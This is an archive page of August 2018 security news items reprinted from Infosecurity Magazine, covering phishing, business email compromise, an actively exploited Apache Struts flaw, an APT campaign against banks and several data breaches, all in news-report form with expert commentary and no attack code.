Intelligent Connections. Powerful Impact.
Call Us: 415-510-2973

Archive for August 2018

Mobile Phishing Campaign Offered Free Flights

Mobile Phishing Campaign Offered Free Flights

A campaign recently reported by Farsight Security involved an internationalized domain name (IDN) "homograph-based" phishing website that tricked mobile users into inputting their personal information. The suspected phishing websites presented as commercial airline carriers – specifically Delta Airlines, easyJet and Ryanair – and offered free tickets, fooling users with the age-old bait-and-switch technique.

Users were asked to respond to a series of seemingly innocent questions and then share the free offer with 15 of their WhatsApp contacts before being directed to the URL where they could access the free tickets. After Farsight discovered the first suspected Delta phishing site, it immediately informed the company. According to Farsight researchers, the websites were optimized for mobile and failed to work smoothly on desktop, leaving mobile users as prime targets.

It’s not unusual for phishing scams to use spoofed sites and homograph domains to fool unsuspecting users with trusted brand names. “Users, especially on smaller mobile screens, may not be paying close attention to the URLs or domain names of sites to verify their legitimacy,” said Dirk Morris, chief product officer at Untangle.

Despite having been around for a while, these types of attacks remain largely successful. “Studies have shown that 95% of web-based attacks use social engineering to trick users,” said Atif Mushtaq, CEO at SlashNext.

“These types of contest phishing scams have become increasingly sophisticated, in large part because people are getting trained by their organizations to recognize fake emails, giveaway scams or imposter websites asking for credit card or login details.”

Being duped by sophisticated phishing scams is not uncommon, but there are common signs to look for in phishing scams. What users need to remember is that nothing is ever really free, explained Ajay Menendez, executive director, HUNT Program at SecureSet.

“Check the 'from' email address for any signs that it might not be legitimate, and look for numbers instead of letters or common misspellings or letters that are inverted or missing. Poor spelling and grammar can be giveaways in the body of the email," Menendez said.

“Your bank and other legitimate accounts will never ask for your social security number in an email. If you receive an email asking for this information, call your bank (and any other company who may be requesting this) to confirm. Never provide email, account information or passwords via email.”

"Many phishing scams will look very legitimate, he said, "so even if the email looks like it comes from your cable company, be extra cautious. This is an instance where an ounce of prevention is worth a pound of cure.”

Source: Information Security Magazine

Orgs Still Feel Vulnerable Despite Cyber Standards

Orgs Still Feel Vulnerable Despite Cyber Standards

Even though the majority of companies across the globe have implemented cybersecurity standards, a new report from IT Governance USA found that companies still believe they are the likely target of an attack.

Since 2017, there has been a 25% increase in data breaches, according to the ISO 27001 Global Report, which also revealed that 68% of organizations are now using ISO 27001 – the international standard for best practices with information security management systems (ISMSs) – to achieve General Data Protection Regulation (GDPR) compliance. Despite this majority, cybersecurity remains a top concern for organizations worldwide.   

With regard to the GDPR, the report found that 43% of companies will be implementing an ISO 27001-compliant ISMS to enable them to maintain compliance with the EU GDPR. More than half of the respondents who have already implemented this standard (57%) reportedly did so because they believed they would gain a competitive advantage.

In fact, the overwhelming majority (89%) of organizations reported that improving their information security was the single greatest benefit of implementing ISO 27001.

“Implementing an ISO 27001-compliant ISMS is not only information security best practice but is also integral to demonstrating data protection compliance,” the report stated. “Even if you do suffer a breach, regulators show leniency to organizations that have certified to ISO 27001 because they are able to demonstrate that they are following information security best practice.”

Perhaps that is why two-thirds of 128 organizations that participated in the survey believe implementing ISO 27001 improves their security posture, reflecting a 3% jump from the 2016 and 2015 reports.

“Unfortunately, as long as cybercrime remains a lucrative trade, risks will continue to escalate, and attackers will continue to proliferate,” said Alan Calder, founder and executive chairman of IT Governance. “To counter this, organizations need to be fully prepared. ISO 27001, an information security standard designed to minimize risks and mitigate damage, offers the preparedness organizations need.”

Source: Information Security Magazine

43% of Security Pros Could Execute Insider Attack

43% of Security Pros Could Execute Insider Attack

A recent survey of nearly 200 IT professionals about insider threats found that nearly half of the participants believed they could successfully attack their organizations from the inside. In a blog post earlier this week Imperva researchers reported on insider threats and revealed the findings of the recent survey. 

Of the 179 IT professionals who participated in the survey, 43% said they were confident they could execute an insider attack. Only a third said carrying out an insider attack would be either difficult or impossible, while a mere 22% felt they had a 50/50 chance of successfully stealing information from the inside.

When asked how they would execute a successful insider attack, 23% said they would use their company-owned laptop to steal information from the organization, 20% would use their personal computers, and 19% would use their own laptops.

“The continued reliance on data for today’s businesses means more people within an organization have access to it,” explained Imperva CTO Terry Ray. “The result is a corresponding increase in data breaches by insiders either through intentional (stealing) or unintentional (negligent) behavior of employees and partners."

“While the most sensational headlines typically involve infiltrating an ironclad security system or an enormous and well-funded team of insurgents, the truth of how hackers are able to penetrate your system may be less obvious: it’s your employees,” he continued.

Insider threats continue to rank top concerns when it comes to cybersecurity threats, suggesting that every company could potentially fall victim to an insider-related breach whether from a malicious actor or an unintended threat.

“It’s much better to put the necessary security measures in place now than to spend millions of dollars later," Ray said. "Every company can take some basic steps in their security posture to minimize insider threats, including background checks, monitoring employee behavior, using the principle of least privilege, controlling and monitoring user access, and educating employees.”

Source: Information Security Magazine

BEC Analysis Reveals Organization-Wide Threat

BEC Analysis Reveals Organization-Wide Threat

Around half of those that receive and are impersonated in Business Email Compromise (BEC) scams aren’t C-level or finance/HR employees, highlighting the importance of a company-wide policy to mitigate the threat, according to new research.

Security firm Barracuda Networks analyzed 3000 BEC campaigns to better understand where and how attackers are focusing their efforts.

Sometimes referred to as “CEO fraud,” the scams often work by impersonating a company boss — either by spoofing their email domain or phishing/cracking their account —and then trying to persuade a member of the finance team to make a large corporate fund transfer to a third-party account.

However, while CEOs accounted for the largest single role impersonated in the scams (43%), an even bigger proportion (48%) came from a long tail of other roles outside the C-level, finance and HR functions.

When it came to recipients, Barracuda Networks found that 54% also came from non-C-suite, finance or HR roles. The next most popular recipients were CFOs (17%) and finance/HR staff (17%).

“As you can see, almost half of the impersonated roles and more than half of targets are not of ‘sensitive’ positions, such as executives, finance or HR,” explained content security services vice-president, Asaf Cidon. “Therefore, simply protecting employees in sensitive departments is not sufficient to protect against BEC.”

The research also found that, although 40% of BEC emails contained a malicious link, the vast majority did not, making it harder for traditional security filters to spot them.

Some 47% requested a direct wire transfer, while 12% sought to establish a rapport with the recipient — presumably before requesting the transfer — and a further 12% were designed to steal personally identifiable information (PII).

Barracuda Networks recommended firms implement a combination of technology designed to combat spear-phishing, often the first stage in a BEC attack, and user education to improve awareness of scams.

Neil Larkins, CTO of Egress Software Technologies, added that AI tools can also be used to improve detection.

“By analyzing people’s email behavior, smart technology can now recognize patterns and highlight anomalies,” he said.

“In cases where a phishing email requires an individual to respond, they can be alerted to the fact they haven’t emailed this recipient before or that the recipient’s domain is not trusted — immediately raising red flags for the user in scenarios where cyber-criminals are leveraging established relationships.”

Source: Information Security Magazine

Cryptojackers Exploit Critical Apache Struts Flaw

Cryptojackers Exploit Critical Apache Struts Flaw

A critical Apache Struts vulnerability disclosed last week is being actively exploited in the wild to maliciously install a popular cryptocurrency miner on victim systems, according to researchers.

Experts at security vendor Volexity warned earlier this week that they spotted the activity shortly after a proof-of-concept exploit was made public.

“The in-the-wild attacks observed thus far appear to have been taken directly from the publicly posted PoC code. In this instance, Apache Struts is vulnerable due to a improper validation of namespace input data, and the flaw is trivial to exploit,” the firm explained.

“Volexity has observed at least one threat actor attempting to exploit CVE-2018-11776 en masse in order to install the CNRig cryptocurrency miner. The initial observed scanning originated from the Russian and French IP addresses 95.161.225.94 and 167.114.171.27.”

The CVSS 10.0 vulnerability was revealed last week, with experts urging admins to patch as soon as possible to protect their systems. A flaw in the popular web application framework was exploited infamously last year when Equifax failed to apply an available update, resulting in a data breach though to have affected nearly half of all Americans.

Advice from the Apache Software Foundation is to upgrade to Struts 2.3.35 or Struts 2.5.17.

There could be more danger ahead for organizations which fail to patch promptly, as the flaw itself enables remote code execution and could theoretically allow attackers to access a targeted system.

Recorded Future revealed it had “detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability,” while Volexity claimed it has “observed multiple APT groups leveraging Apache Struts vulnerabilities to gain access to target networks.”

Trend Micro revealed in its midyear roundup report this week that detections for cryptocurrency miners rocketed 956% from the first half of 2017 to the first six months of this year.

Source: Information Security Magazine

APT Uses Spear Phishing in New Campaign

APT Uses Spear Phishing in New Campaign

An advanced persistent threat group, active since at least 2016 and suspected in exploiting multiple attacks around the globe, is reportedly targeting institutions in Europe and Russia, according to a report released today from NETSCOUT Arbor.

On 13 August NETSCOUT’s ASERT team identified new spear-phishing campaign activity from the financially motivated hacking group Cobalt. Given that the messages appear to be coming from a trusted source, many victims fall prey to these types of campaigns in which malicious actors disguise themselves as other financial institutions. 

The phishing messages used to gain entry look as if they come from a financial vendor or partner domains, increasing the likelihood of infection. In addition, the group reportedly uses tools that allow them to bypass Window’s defenses.

NS Bank in Russia and Banca Comerciala Carpatica of Romania were the two phishing targets found in which one of the phishing emails was weaponized with two malicious URLs.

The first contained a malicious Word document that obfuscated VBA scripts, which researchers said differed from the known CVEs that had been used in parallel to this campaign.

The second weapon was a binary with a JEPG extension. Researchers analyzed the binaries and found that they contained “two unique C2 servers we believe are owned and operated by the Cobalt hacking Group.”

These two malware samples suggest that the campaigns are connected to Cobalt Group. Analysis showed that a JavaScript backdoor, believed to be a stager for additional payloads, contained functionality that is similar to another version of a similar backdoor.

“This Cobalt Group actor(s) mimic financial entities or their vendors/partners in order to gain a foothold in the target’s network. Making use of separate infection points in one email with two separate C2s makes this email peculiar,” researchers wrote.

“One could speculate that this would increase the infection odds. The actor tries to hide the infection by using regsvr32.exe and cmstp.exe, which are both known for by-passing AppLocker (configuration dependent)," they continued.

"ASERT believes Cobalt Group will continue targeting financial organizations in Eastern Europe and Russia based on the observables in this campaign and their normal modus operandi.”

Source: Information Security Magazine

Hundreds of Banks Exposed from Fiserv Flaw

Hundreds of Banks Exposed from Fiserv Flaw

A flaw in the web platform of Fiserv Inc., a technology services provider for financial institutions, reportedly exposed personal and financial account information on hundreds of bank websites, according to KrebsonSecurity.

Security researcher Kristian Erik Hermansen contacted Krebs two weeks ago to report that “he’d discovered something curious while logged in to an account at a tiny local bank that uses Fiserv’s platform.” Shortly thereafter, KrebsonSecurity contacted Fiserv, which explained that there had been an issue in “a messaging solution available to a subset of online banking clients.”

While Fiserv declined to say exactly how many financial institutions may have been impacted overall, there are reportedly 1,700 banks currently using Fiserv’s banking platform.

“Fiserv places a high priority on security, and we have responded accordingly,” a Fiserv spokesperson told Krebs.

“After receiving your email, we promptly engaged appropriate resources and worked around the clock to research and remediate the situation. We developed a security patch within 24 hours of receiving notification and deployed the patch to clients that utilize a hosted version of the solution. We will be deploying the patch this evening to clients that utilize an in-house version of the solution.”

Fiserv is a critical financial services vendors for banks around the globe. “A breach or data leak such as this could have a huge impact on not only the financial system in the US but globally as well,” said Jake Olcott, VP of strategic partnerships at BitSight Technologies.

“Hundreds of banks that leverage its solutions were impacted by this breach, demonstrating firsthand the imperative need for financial services companies to keep a close eye on the third-party vendors that have access to their data and customer information," Olcott continued. 

“At a higher level, financial services companies need to make sure they are having continuous, data-driven conversations with their vendors about security efforts and procedures. Fostering a more collaborative approach to security can unite businesses and their vendors in the war against an increasingly volatile threat landscape and help safeguard all parties from leaks and breaches."

Source: Information Security Magazine

Hearing Date Set in Georgia Election Security Case

Hearing Date Set in Georgia Election Security Case

A hearing has been filed in the ongoing Georgia election cybersecurity case, Curling v. Kemp, where Georgia citizens are fighting for more secure elections in a lawsuit against Secretary of State and gubernatorial candidate Brian Kemp. The hearing is scheduled for Monday, 17 September, at 11am.

Oral arguments will take place at the US District Court in Atlanta before Judge Amy Totenberg, and David Cross, a partner at the law firm Morrison & Foerster, will represent the group of Georgia citizens who are the case’s plaintiffs.

Currently, Georgia’s voting system uses direct-recording electronic (DRE) voting machines and is one of only several states to have no independent paper trail, which leaves the electronic voting system vulnerable to election interference.

On behalf of the plaintiffs, Cross filed a brief in US federal court supporting their request for Georgia to switch to paper ballots for the November election. As part of the order filed, the Court denied the state’s motion to dismiss as to standing and immunity.

“Plaintiffs’ requested relief places all voters on an equal playing field and protects all voters against interference,” the brief said. “Defendants have provided no basis for this Court to find that the requested relief is so much more burdensome than the costly, complex, unsecure DRE-based system to warrant subjecting voters to that unreliable system.”

The plaintiffs added, “Defendants provide no basis for this Court to deny the Curling Plaintiffs’ Motion. They substitute conjecture for facts and legal authority and implicitly concede the inherent unreliability of the current DRE-based system. But they refuse to do anything about it this year. This violates the U.S. Constitution and Georgia state law and necessitates injunctive relief.”

Additionally, the plaintiffs “fully appreciate the gravity of their request” but said that “a preliminary injunction from this Court is the only way to protect their right to vote against manipulation or dilution this year.”

After the oral arguments are heard, Judge Totenberg will decide whether Georgia will have to switch to using paper ballots for the upcoming November general election, though there is no timeline yet for when a decision will follow.

Source: Information Security Magazine

Machine Identity Failings Expose Firms

Machine Identity Failings Expose Firms

Nearly all IT decision makers believe that protecting machine identities is as important or more important that human identity management, but most struggle to deliver that protection, according to a new Forrester study.

The analyst firm was commissioned by Venafi to poll 350 global IT leaders about the challenges facing them from securing machine identities, which 80% said they are having difficulties with.

In this context, “machine” could mean any kind of digital entity on a network, according to Venafi vice-president of security strategy and threat intelligence, Kevin Bocek.

“This means that everything including websites software, applications, devices, even algorithms, are machines,” he told Infosecurity. “And every single one of them needs an identity in order to communicate with other machines securely.”

Unfortunately, while IAM in the context of human identities is maturing, this failure to protect digital entities represents a coming security storm.

Nearly half (47%) of respondents said protecting machine identities and human identities will be equally important to their organizations over the next 12-24 months, while 43% claimed machine identity protection will be more important.

The vast majority (70%) admitted they are tracking fewer than half of the most common types of machine identities found on their networks, including cloud instances (56%), mobile devices (49%), SSH keys (29%) and containers and microservices (25%).

This could expose them to the risk of customer and corporate data theft, process disruption, downtime and customer attrition, the report claimed.

Bocek explained that machine identity attacks typically follow one of three methods.

“In the first, hackers steal machine identities for spoofing purposes, using them to establish themselves as trusted inside a network or to move around without being detected. Last year, for example, saw over 14,000 fake PayPal sites set up by scammers abusing machine identity to help them trick unsuspecting web users,” he said.

“The second scenario sees the misuse of machine identity to cause havoc across the victim’s entire network — a classic example of this would be the 2015 Ukrainian power grid attack when Russia managed to insert a valid SSH key into the grid and used it to shut down power across the country. Lastly, stolen machine identities are also used by hackers who want either to infiltrate an organization without being noticed and exfiltrate large amounts of data, hit targets with malware such as SQL injection attacks or cross-scripting attacks or to escalate privileges.”

Mitigating machine identity attacks requires IT teams to gain visibility into the location of every digital entity on the network and ensure their keys and certificates are valid and up-to-date.

“Organizations need to automate the process of securing machine identities, since in today’s environment, they’re being created and used on a scale that only other machines can keep up with,” Bocek added. “For any mid- to large-size organization, centralizing and automating the discovery, replacement and remediation of all machine identities on a network is the only realistic defense.”

Source: Information Security Magazine

Chinese Hotel Breach May Have Hit 100 Million+ Customers

Chinese Hotel Breach May Have Hit 100 Million+ Customers

Chinese police are investigating a possible breach at a major hotel group which could have affected over 100 million customers.

Shanghai's Changning District police confirmed on Tuesday it was called out by Huazhu Group which operates more than 3000 hotels in hundreds of cities, running 18 brands domestically including foreign chains Mercure and Ibis hotels.

The incident came to light after a dark web vendor put data allegedly stolen from the group up for sale for eight Bitcoins ($55,600).

State media claimed that 500 million records were stolen. These reportedly included 123 million registration details including names, mobile numbers and ID numbers; 130 million check-in records including names, addresses and birth dates and 240 million hotel stay records including card and mobile numbers.

Cybersecurity intelligence firm Zibao reportedly suggested the breach may have happened when the hotel’s developers uploaded a database to GitHub.

Andy Norton, director of threat intelligence at Lastline, speculated that the hackers in this case may not be experienced.

"It looks like human error is to blame for this breach. It also looks like the threat actors selling the data don't have the contacts or infrastructure to monetize the stolen IDs individually,” he explained. “It could be that speculative Google dorking resulted in a script kiddie holding this data and trying to sell it.”

Tim Mackey, technical evangelist at Synopsys, added that if the GitHub rumors are true the hack appears to be in the same opportunistic mold as last year's Uber breach.

“Development teams using public source code systems like GitHub and public continuous integration (CI) systems like Travis-CI need to recognize that any developer activity which causes a push to a public repository or a public branch can be viewed by others,” he said.

“The increasing popularity of hosted development tools like GitHub, Jira and Travis-CI make them ideal sources of information for malicious actors.”

If there are any EU citizens' data amongst the trove it will also be interesting to see how China reacts to a possible GDPR investigation.

Source: Information Security Magazine